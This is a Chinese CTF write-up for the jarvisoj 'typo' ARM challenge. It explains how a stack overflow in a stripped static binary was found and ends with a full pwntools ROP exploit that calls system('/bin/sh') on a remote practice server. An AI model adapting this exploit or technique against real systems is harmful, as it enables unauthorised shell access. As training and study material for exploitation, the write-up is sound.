jarvisoj_typo
查看保护
arm程序,这一类的环境的话可以去网上找找怎么安装,qemu,gdb-multiarch,等 等
32位,静态链接,去了符号表信息
攻击思路:因为去了符号表信息,进了ida之后基本看不出程序功能
这里笔者直接手动fuzz了一下发现有栈溢出漏洞
保护没有开canary和pie,所以考虑rop了。
劫持程序控制流执行system("/bin/sh");找一下/bin/sh
看了一下引用,跟进10bab
这个函数和do_system()很相似,暂且先认为它是system吧,因为错了还可以继续找(XD
有了/bin/sh有了system接下来就是rop,确定一下偏移直接动调这里动调的方法和x64下的基本一样
这里笔者用的是gdb-multiarch
和qemu-arm -g 1234 z1r0
形成的动态调试,测出偏移为112
接着就是找gadget,arm里面的一参数是r0
ROPgadget --binary z1r0 --only 'pop|ret' | grep r0
payload和x64rop一样的,运行即可getshell(笔者这里的exp没有什么qemu-arm,笔者也不知道为什么 ,安装完环境之后笔者这里可以直接运行arm的程序了。。。
from pwn import *
context(arch='arm', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27675)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
pop_r0_r4_pc = 0x00020904
bin_sh = 0x0006c384
system_addr = 0x10BA8
p1 = b'a' * 112 + p32(pop_r0_r4_pc) + p32(bin_sh) * 2 + p32(system_addr)
#p1 = b'a' * 112 + p32(system_addr)
print(cyclic(0x100))
r.send('\n')
r.sendline(p1)
r.interactive()